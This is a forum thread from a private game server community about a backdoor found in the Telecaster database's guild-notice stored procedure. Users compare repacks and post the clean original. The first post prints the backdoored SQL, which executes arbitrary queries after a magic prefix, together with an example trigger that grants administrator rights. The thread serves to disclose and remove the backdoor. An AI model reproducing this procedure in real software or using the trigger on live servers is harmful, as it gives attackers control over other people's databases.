Stored Procedure Backdoor E9.1

Dark Blaze · 05/27/2017, 01:58

Found a backdoor in Telecaster database for E9.1 in Revo's first release, it has been changed after while.

smp_set_guild_notice

Code:

USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/27/2017 1:49:17 AM ******/
SET ANSI_NULLS OFF
GO
SET QUOTED_IDENTIFIER OFF
GO

ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID	INT,
@IN_NOTICE		NVARCHAR(128)
AS
SET NOCOUNT ON

IF (LEFT(@IN_NOTICE, 6) = '_)$*%R')
	BEGIN
		set @IN_NOTICE = REPLACE(@IN_NOTICE,'_)$*%R','')
		EXEC sp_executesql @IN_NOTICE;
	END
ELSE
	BEGIN
		UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID
	END

The backdoor works by starting your guild notice with "_)$*%R" then writing the query, for example writing "_)$*%R UPDATE Character SET permission = 100 WHERE name = 'DarkBlaze'" would grant me GM permissions on a server using Telecaster database provided by ismoke.

ThunderNikk · 05/27/2017, 02:53

Great here is the original in case people want to modify...

Code:

USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/26/2017 8:50:20 PM ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
--RevolutionTeam
ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID INT,
@IN_NOTICE  NVARCHAR(128)
AS
SET NOCOUNT ON

 UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID

SilentWisdom · 05/27/2017, 10:19

Let's be clear I only released a cleaned version of the Telecaster that was released by Revolution. I did not, have never and will never use/release/endorse hacks.

Dark Blaze · 05/27/2017, 13:17

I downloaded both your Telecaster and theirs and checked each one, I only found that in yours. You can check both mirrors.

TheOnlyOneRaskim · 05/27/2017, 14:27

Haha funny.

Smoke, Come to the dark side. I have cookies. XD

InkDevil · 05/27/2017, 15:26

Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution

So if @

cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations

Ghost Informatics · 05/27/2017, 16:27

The bug in the files from 8.1 you can check the 8.1 repacks the most of them are bugged and 9.1 also we fixed this bug from 2016 .. some team named (volcano) they bugged files and tools with auto inject i don't know any tool but i got a files after i hacked them this files proof that and there's other bug in insert character 8.1 & 9.1 we fixed it( and we published the most bugged files in the arabic forums after we fixed it) you can download our repack for 7.2&9.1 it's clean and al7rob repack by rakanomar for 8.1 .. there's many bugged tools in rappelz world i advise you to see the source of tools before download ..

Dark Blaze · 05/28/2017, 01:44

Quote:

Originally Posted by LamiaCore

Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution

So if @ cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations

Not accusing him of doing it, just stating that the one currently included has that backdoor.

Ghost Informatics · 05/29/2017, 10:15

Nulled

ThunderNikk · 05/29/2017, 14:52

I cleaned up this thread a little.

Lets keep it civil guys. We know there was a possible exploit that may be in our telecasters and we know how to make it right.

Doesn't really matter who put it in there now.

Ill leave the topic open for now in case there are other users who need help with this or in case some want to discuss this some more, but if the accusations and defense of accusations keep getting thrown around I will have to close the thread.